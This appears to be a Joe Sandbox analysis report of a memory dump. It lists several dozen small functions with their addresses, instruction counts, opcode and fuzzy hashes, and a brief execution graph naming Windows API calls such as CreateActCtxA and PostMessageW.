                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 39f80bdb6c2c324458d966142ca52dfcf9bbbdf6b059d009571d4a51bf69a681
                                                  • Instruction ID: 2bcb6ec595631018f7db6bbe418a50840f3151317cb812cd727d2327298aeda3
                                                  • Opcode Fuzzy Hash: 39f80bdb6c2c324458d966142ca52dfcf9bbbdf6b059d009571d4a51bf69a681
                                                  • Instruction Fuzzy Hash: 38F0E2312486048FCB21B7549544B39B7B1AF81218F1CC0ABA90C8B682C33FC9479B96
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 051809E3 Relevance: .0, Instructions: 32COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3b97f7a499c0844c48b2a870e741dedaec605d38274e2affe54b2c90b474bc9f
                                                  • Instruction ID: 6a35e65444476e7c9a081c1cefea8e00100937d8bbb95ec3a752b5b648ee0f57
                                                  • Opcode Fuzzy Hash: 3b97f7a499c0844c48b2a870e741dedaec605d38274e2affe54b2c90b474bc9f
                                                  • Instruction Fuzzy Hash: 93F09630A05158DBDB38EB55E8447EAB776AF86308F0182A5854963344DF701E84CF81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 051809E8 Relevance: .0, Instructions: 31COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 72be8f1fa3915234e040a76c679da5de28b87aee8c67525ad90c64131bbe4620
                                                  • Instruction ID: 2901271105f9b70e416aa314ffe2285d8fa4f8a0f56e1e17388d191a5ad55515
                                                  • Opcode Fuzzy Hash: 72be8f1fa3915234e040a76c679da5de28b87aee8c67525ad90c64131bbe4620
                                                  • Instruction Fuzzy Hash: C2F09030A051189BDB38EB65E848BEAB77AAF8A308F0182A5844963284DF301D84CF81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05188BB0 Relevance: .0, Instructions: 31COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e67f0a60997d097f704f89f545e9de8fc018f72e3654edb931b3d63bf23cdb86
                                                  • Instruction ID: 3cc392b9e52334775f2911fe7bf1c6a084f081418ec12a2e686e996e50139f1d
                                                  • Opcode Fuzzy Hash: e67f0a60997d097f704f89f545e9de8fc018f72e3654edb931b3d63bf23cdb86
                                                  • Instruction Fuzzy Hash: F9F0F8716147059FDB28DF18D4829A577E6FB4525C7240C5AE41ACF301D772E9038B84
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05182021 Relevance: .0, Instructions: 30COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 92144e8acf38c465853ffd98a17950f550e13de71dc400b0a4c966f32d8d9f41
                                                  • Instruction ID: 8378b7fc2c32978b4eb6c27d3079abe38d0361d293ed8299ed743ca6efe15086
                                                  • Opcode Fuzzy Hash: 92144e8acf38c465853ffd98a17950f550e13de71dc400b0a4c966f32d8d9f41
                                                  • Instruction Fuzzy Hash: 2D011674A102188FCB64EB24C95479DB7B2FF86300F10429AD50977244EB305AC5CF85
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0518CF6C Relevance: .0, Instructions: 29COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 717610e2468e0b2f15f5fd7949423078154025b4e276a267f352d385e6fc3c14
                                                  • Instruction ID: cd807279f6f9d9d0d596a9956c6228cafed6b66f79f1ad41bb5f43ef7db295c5
                                                  • Opcode Fuzzy Hash: 717610e2468e0b2f15f5fd7949423078154025b4e276a267f352d385e6fc3c14
                                                  • Instruction Fuzzy Hash: 98E09271208B11AB9634BA65E884C37B7EEFB442283000A19F44AC7A41DB21EC41CAF0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05188A20 Relevance: .0, Instructions: 28COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 28bd2414ff757c1bb515c179c5eee899951ece4eaba0bad82a414eb62010cd30
                                                  • Instruction ID: 8cdd436a2fb1f1888a31a9972ea8ecb7aeacaa90129a4ca39ce27d1308ff3393
                                                  • Opcode Fuzzy Hash: 28bd2414ff757c1bb515c179c5eee899951ece4eaba0bad82a414eb62010cd30
                                                  • Instruction Fuzzy Hash: 63F08C31614700AB8B18DF2CD8054A577E1FF8522C3204DADE028CF246E772E8438BD0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0518A668 Relevance: .0, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9d23b7d0f2ba2ee0e98f3ecbefbe6fe54def2075fda111f8d6b8b911aa5d3cb9
                                                  • Instruction ID: 95d6d658126bc04d54ea9e90fb2b7a08349afbb8dc91374ab88906dad2b0b827
                                                  • Opcode Fuzzy Hash: 9d23b7d0f2ba2ee0e98f3ecbefbe6fe54def2075fda111f8d6b8b911aa5d3cb9
                                                  • Instruction Fuzzy Hash: 2EE09232204158ABCB119E49E800DAE7BDAEBC8224B08841AF949C7111CB75A9219BB4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05183E24 Relevance: .0, Instructions: 24COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3a89e932a99f4a025fc208d331c15f76843adb3304df124625b15012b1a54378
                                                  • Instruction ID: 754c5051f45c0865f52539f9d1de9b232e5e14f8dfb44e4f890c8fcda32e2a25
                                                  • Opcode Fuzzy Hash: 3a89e932a99f4a025fc208d331c15f76843adb3304df124625b15012b1a54378
                                                  • Instruction Fuzzy Hash: 42F0D0306151598BEB78EF24DD84AFEB372EF89304F114AD4814D67A55CF305E848F81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05189290 Relevance: .0, Instructions: 24COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5bf1263dfe9f2f458ec6ab028e6273cfacb9398cd039a6af4f0f18f2415dc006
                                                  • Instruction ID: a3e8bedbe22a01bb05389779dc48ea1b4f4cee646d6a44271b7d15d97e44f6b4
                                                  • Opcode Fuzzy Hash: 5bf1263dfe9f2f458ec6ab028e6273cfacb9398cd039a6af4f0f18f2415dc006
                                                  • Instruction Fuzzy Hash: 03E0C2327506210BC728A64EE808A7E339BEFCCA21B1840B6F00ACB766CE21CC018690
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05181320 Relevance: .0, Instructions: 23COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 12864f4ab2b5a2cfec50f8c0b577632a4425b07f11e60debc5d642dc7993fdbb
                                                  • Instruction ID: 93de9d5bcab492f98906815815ec662a68516c1e2f19f2151903c157d6a543eb
                                                  • Opcode Fuzzy Hash: 12864f4ab2b5a2cfec50f8c0b577632a4425b07f11e60debc5d642dc7993fdbb
                                                  • Instruction Fuzzy Hash: 48F03978609244CFC7A8EB24D881AA9B7F6EF4F204F0590E5A85DA7756CF349D809F81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05181D74 Relevance: .0, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fda395c8e6025fa8a41defe992fe0f1786b435afe9e5204bfdb808eaa143102a
                                                  • Instruction ID: c8de082302683e9c3ef5c3d8189d97536bb1d0fa44102861b8c486dfe7875cc1
                                                  • Opcode Fuzzy Hash: fda395c8e6025fa8a41defe992fe0f1786b435afe9e5204bfdb808eaa143102a
                                                  • Instruction Fuzzy Hash: BFF09838A18699CBCB78FB50D9946FDB372BF8930CF0506E4915D6B615CB701E858F80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05180D81 Relevance: .0, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e53e033f232663c28ce66121787efcffeb17b46cbe4591aa21c9f62ddef3b571
                                                  • Instruction ID: 5cd538b039b25ad44b7b24062cc3634703f7e6c95ce28a3c2a20dedd86bf5fa6
                                                  • Opcode Fuzzy Hash: e53e033f232663c28ce66121787efcffeb17b46cbe4591aa21c9f62ddef3b571
                                                  • Instruction Fuzzy Hash: 60F0F874A042188FC764EF24D848B99B7F2FB4A304F1581EA9458AB345DB309D85CF92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05189870 Relevance: .0, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0b934949396faedf4fefbf40b0d6dd8b2ee3a7a5ca553fbe47166e7540c61737
                                                  • Instruction ID: cfb33d932f09c63200d4ef31dc8faca526fd675a24cff8ea7bd6fd8ac23b7811
                                                  • Opcode Fuzzy Hash: 0b934949396faedf4fefbf40b0d6dd8b2ee3a7a5ca553fbe47166e7540c61737
                                                  • Instruction Fuzzy Hash: 47E06539804108EFCB08EFD4E844EA8BFB5FB49300F14C1A9E9081B361C7329A61EF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05181EEC Relevance: .0, Instructions: 21COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 11378b94869c660f919b4890f0802b164171b88b2b9a9b070c8eae0cb73c67f8
                                                  • Instruction ID: 5e4b3090027c3d20cab0dbc01c31466572bb32767bf5e6095cbe792a2683ef31
                                                  • Opcode Fuzzy Hash: 11378b94869c660f919b4890f0802b164171b88b2b9a9b070c8eae0cb73c67f8
                                                  • Instruction Fuzzy Hash: 1FF039B8A056188FC764EB28D984BA9B7B5EF4A304F1140E9944DAB307DB349E81CF41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05185328 Relevance: .0, Instructions: 20COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7bbe6512b0bba61967cd263644cc6b279b3953d1c7cf4415c53c8d05597b1acf
                                                  • Instruction ID: 8fe4417c4ede92081b32bb78eb6d874297fc094bd5e69d85da3b2e97d8e7d56f
                                                  • Opcode Fuzzy Hash: 7bbe6512b0bba61967cd263644cc6b279b3953d1c7cf4415c53c8d05597b1acf
                                                  • Instruction Fuzzy Hash: B4E0E574705204DFD768EB24D594EA973F6FF4E308F0680A4A54EA7B45CB349D418F41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0518FFA0 Relevance: .0, Instructions: 20COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 99d6cf881229ca992143b4ee835a96c552908a990c67040ee3aa16fe1d3c7ba7
                                                  • Instruction ID: 6274dd879eeae036c9137e63e02664e537a47f025addb4dca9b2c9da1de7286e
                                                  • Opcode Fuzzy Hash: 99d6cf881229ca992143b4ee835a96c552908a990c67040ee3aa16fe1d3c7ba7
                                                  • Instruction Fuzzy Hash: D8E07574E05208AFCB54EFA9D55569DFBF4EB48304F24C1AA9818A3344D7359A52CF81
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0518D1E0 Relevance: .0, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 739ab271acbc6820fc1dc1ab4d0a61a8c10e815340ce4477a28be38571836cc3
                                                  • Instruction ID: 73ffeda0aa6f62f838dc2c96fe29e41553925b6e28abb7e4d7a3864dbaeeb76d
                                                  • Opcode Fuzzy Hash: 739ab271acbc6820fc1dc1ab4d0a61a8c10e815340ce4477a28be38571836cc3
                                                  • Instruction Fuzzy Hash: 25E04F30900109EF8700EFB4E602C5D77B9EB84258B104468D904DB604DB311F00AB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05189248 Relevance: .0, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6031702bc8d965c5d7f03f4f07cb37bff4bdcc910db22a72cee30eb72b5e0229
                                                  • Instruction ID: 8e6e84ee4481365e30eb7a880e852407bd847fb2f650128706591713a214ad1a
                                                  • Opcode Fuzzy Hash: 6031702bc8d965c5d7f03f4f07cb37bff4bdcc910db22a72cee30eb72b5e0229
                                                  • Instruction Fuzzy Hash: 49E08674908108EBCB14DFD4E45096DBF78FB45300F1081A9D84457344C7319A52DB95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0518D9C8 Relevance: .0, Instructions: 18COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 951c0926532cdbfdc8394f1dfa3bd537fece857d9ab6b38e182742ad308b21db
                                                  • Instruction ID: 36891553fa31b8e20c97dc1259c64da8f31b02661e8fa8f4629c125d5f80e887
                                                  • Opcode Fuzzy Hash: 951c0926532cdbfdc8394f1dfa3bd537fece857d9ab6b38e182742ad308b21db
                                                  • Instruction Fuzzy Hash: 40E0EC34944208EBCB18EFD4E941A6DBB75FB55314F2082A9DD0527344C732AA62DB95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05185346 Relevance: .0, Instructions: 18COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1c2cc6a0f3ac12c698f99d1c877aa3f3162d16803ff2e7943a61053a49f6f36c
                                                  • Instruction ID: acb178771e5b7fc3bca53b6c2ae3930e6eaf3b10bcd20aa53ce0da5e215fb4ca
                                                  • Opcode Fuzzy Hash: 1c2cc6a0f3ac12c698f99d1c877aa3f3162d16803ff2e7943a61053a49f6f36c
                                                  • Instruction Fuzzy Hash: 1BE0C274A052188FD7A4EF24D994BA9B7F6FB8D314F1040A8D889A3745DB385E908F51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05188E00 Relevance: .0, Instructions: 18COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f80b5094f627f3206a6d227df80394242387a81a9feb5acb2327909f899894c9
                                                  • Instruction ID: c744a32d8d0c6b1afb9514f1c61bedc7fdf26bc18a4861c30789022803b8b08f
                                                  • Opcode Fuzzy Hash: f80b5094f627f3206a6d227df80394242387a81a9feb5acb2327909f899894c9
                                                  • Instruction Fuzzy Hash: 1BD0127184920CEBCB14EBF4E9446AEB6B8EB05344F5106A5D50593210DB310A6497A5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05188A80 Relevance: .0, Instructions: 18COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 54531ad595bab189af4e92e1e590d5dd0443f3e02bc49050c53a1ff3eb1c9c4d
                                                  • Instruction ID: b89b44e57af51e8d1fe225c2222448b5ae967ee49da64afe4d961888b418d6dc
                                                  • Opcode Fuzzy Hash: 54531ad595bab189af4e92e1e590d5dd0443f3e02bc49050c53a1ff3eb1c9c4d
                                                  • Instruction Fuzzy Hash: 84D05E317047180BD70976489014BAB76CA9B8DB50F04806AE5098B381DAA19C0046D5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05183022 Relevance: .0, Instructions: 17COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e326ecfa24b64228465636e2153b0c5221e06ecca8032e14c032fdada10a8ce2
                                                  • Instruction ID: 339b55f500b1350423deaf573a35e16c2551543e6eee0aa8d6d79480d9d4326a
                                                  • Opcode Fuzzy Hash: e326ecfa24b64228465636e2153b0c5221e06ecca8032e14c032fdada10a8ce2
                                                  • Instruction Fuzzy Hash: B5D05E75A44104DFCB64EF68E4849FCF7BAFF8E226F0150A6E20D97401DB3419559F41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 051853B4 Relevance: .0, Instructions: 17COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8395c9a1cb929df86b8cc8a0c5df413e292650711fd48355afc0123fb796a1d8
                                                  • Instruction ID: fa7775b919608cbb459c298fede30e5a2ba9a7b6cc471cc119212d775d2a379e
                                                  • Opcode Fuzzy Hash: 8395c9a1cb929df86b8cc8a0c5df413e292650711fd48355afc0123fb796a1d8
                                                  • Instruction Fuzzy Hash: 3BE04F71946508DFD764EF74E848ABDB7F1FB49311F1040A89859A7394EF380E409F50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05182EAA Relevance: .0, Instructions: 17COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d2429ae4403a1146c90925f19c77a218d6a7d5a8ead1c355a877b0de6f1a1852
                                                  • Instruction ID: 939120193c57febf50fabf1e729cd9fbc23474f85159c7d659b1c6af1cbb16f2
                                                  • Opcode Fuzzy Hash: d2429ae4403a1146c90925f19c77a218d6a7d5a8ead1c355a877b0de6f1a1852
                                                  • Instruction Fuzzy Hash: 33E046746052149FE359DB28C9A0BAA77B2EF8A300F024095A08AAB342CB345D49CB42
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 051851BE Relevance: .0, Instructions: 13COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 767aa4ac20310ed585fd7d2c6b3597631861526b35562276765d66a0cb44f36e
                                                  • Instruction ID: e68cc3944f03e225299e8e3081f69d63fa07de547c76d5345d9711c47597720b
                                                  • Opcode Fuzzy Hash: 767aa4ac20310ed585fd7d2c6b3597631861526b35562276765d66a0cb44f36e
                                                  • Instruction Fuzzy Hash: 21E0123574A659CFC764EF10D8546EDB736AF86308F0196D4818D67261CB301D81CFC1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 05189224 Relevance: .0, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000014.00000002.361521180.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_20_2_5180000_jVULYR.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 53cabed9f112416962406c7969fcb057f3f201e97de49e0a0a431fa78f11ac45
                                                  • Instruction ID: 409b0f9768d672e359d9e80707c7f3ca182b9291f0673d04e520c6c9f63c0797
                                                  • Opcode Fuzzy Hash: 53cabed9f112416962406c7969fcb057f3f201e97de49e0a0a431fa78f11ac45
                                                  • Instruction Fuzzy Hash: 48C02B1428C18043C050F314018873F62E16F51604FC1CC47EE0C45343C31A8B137F23
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage:13.1%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:60
                                                  Total number of Limit Nodes:1
                                                  execution_graph 12923 11a3f98 12924 11a3fb2 12923->12924 12929 11a5568 12924->12929 12925 11a3fd3 12933 11a376c 12925->12933 12930 11a5578 12929->12930 12931 11a5588 12930->12931 12940 11a5650 12930->12940 12931->12925 12934 11a3777 12933->12934 12935 11a5568 CreateActCtxA 12934->12935 12936 11a8369 12935->12936 12957 11a8651 12936->12957 12962 11a8660 12936->12962 12937 11a838d 12941 11a565f 12940->12941 12945 11a5b41 12941->12945 12949 11a5b50 12941->12949 12947 11a5b4f 12945->12947 12946 11a5c54 12946->12946 12947->12946 12953 11a57e4 12947->12953 12950 11a5b77 12949->12950 12951 11a5c54 12950->12951 12952 11a57e4 CreateActCtxA 12950->12952 12952->12951 12954 11a6be0 CreateActCtxA 12953->12954 12956 11a6ca3 12954->12956 12958 11a8677 12957->12958 12967 11a86a8 12958->12967 12972 11a8699 12958->12972 12959 11a8687 12959->12937 12963 11a8677 12962->12963 12965 11a86a8 CreateActCtxA 12963->12965 12966 11a8699 CreateActCtxA 12963->12966 12964 11a8687 12964->12937 12965->12964 12966->12964 12968 11a86c5 12967->12968 12969 11a86de 12968->12969 12977 11a8778 12968->12977 12983 11a8768 12968->12983 12969->12959 12973 11a86c5 12972->12973 12974 11a86de 12973->12974 12975 11a8778 CreateActCtxA 12973->12975 12976 11a8768 CreateActCtxA 12973->12976 12974->12959 12975->12974 12976->12974 12978 11a8788 12977->12978 12979 11a5568 CreateActCtxA 12978->12979 12980 11a8798 12979->12980 12981 11a5568 CreateActCtxA 12980->12981 12982 11a87b3 12981->12982 12982->12969 12984 11a8788 12983->12984 12985 11a5568 CreateActCtxA 12984->12985 12986 11a8798 12985->12986 12987 11a5568 CreateActCtxA 12986->12987 12988 11a87b3 12987->12988 12988->12969 12989 8d58d90 12990 8d58f1b 12989->12990 12991 8d58db6 12989->12991 12991->12990 12993 8d59010 PostMessageW 12991->12993 12994 8d5907c 12993->12994 12994->12991 12995 11aded0 12996 11adf12 12995->12996 12998 11adf19 12995->12998 12997 11adf6a CallWindowProcW 12996->12997 12996->12998 12997->12998

                                                  Executed Functions

                                                  Function 011A6BD6 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
